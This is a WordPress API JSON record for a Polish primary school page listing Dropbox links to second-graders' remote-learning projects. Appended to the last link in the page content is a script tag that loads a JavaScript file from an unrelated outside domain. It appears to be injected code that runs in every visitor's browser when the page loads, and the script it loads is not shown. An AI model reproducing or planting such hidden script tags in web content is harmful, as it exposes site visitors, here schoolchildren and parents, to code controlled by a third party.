{"id":14946,"date":"2020-04-02T07:46:48","date_gmt":"2020-04-02T05:46:48","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=14946"},"modified":"2020-04-23T08:36:10","modified_gmt":"2020-04-23T06:36:10","slug":"prace-uczniow","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/prace-uczniow\/","title":{"rendered":"Prace uczni\u00f3w"},"content":{"rendered":"<p>Zapraszamy do obejrzenia prac uczniowskich powsta\u0142ych w czasie obowi\u0105zywania nauki zdalnej.<\/p>\n<p><a href=\"https:\/\/www.dropbox.com\/sh\/oi6gu9iqrpu4aem\/AABYztrQn11zIcEWafLZLR0xa?dl=0\" target=\"_blank\" rel=\"noopener\">Hodowla fasoli w klasie drugiej<\/a><\/p>\n<p><a href=\"https:\/\/www.dropbox.com\/sh\/9yz77dr8kc3hr6q\/AABN_mUz9roZLM-K-37zOZpoa?dl=0\" target=\"_blank\" rel=\"noopener\">Malowanie widelcem &#8211; klasa druga<\/a><\/p>\n<p><a href=\"https:\/\/www.dropbox.com\/sh\/jzn7d5za7xal4sr\/AABujehMnCgBnS0LqS2aKk4Da?dl=0\" target=\"_blank\" rel=\"noopener\">Smaczne zadanie drugoklasist\u00f3w<\/a><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zapraszamy do obejrzenia prac uczniowskich powsta\u0142ych w czasie obowi\u0105zywania nauki zdalnej. Hodowla fasoli w klasie drugiej Malowanie widelcem &#8211; klasa druga Smaczne zadanie drugoklasist\u00f3w<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/14946"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=14946"}],"version-history":[{"count":2,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/14946\/revisions"}],"predecessor-version":[{"id":14972,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/14946\/revisions\/14972"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=14946"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}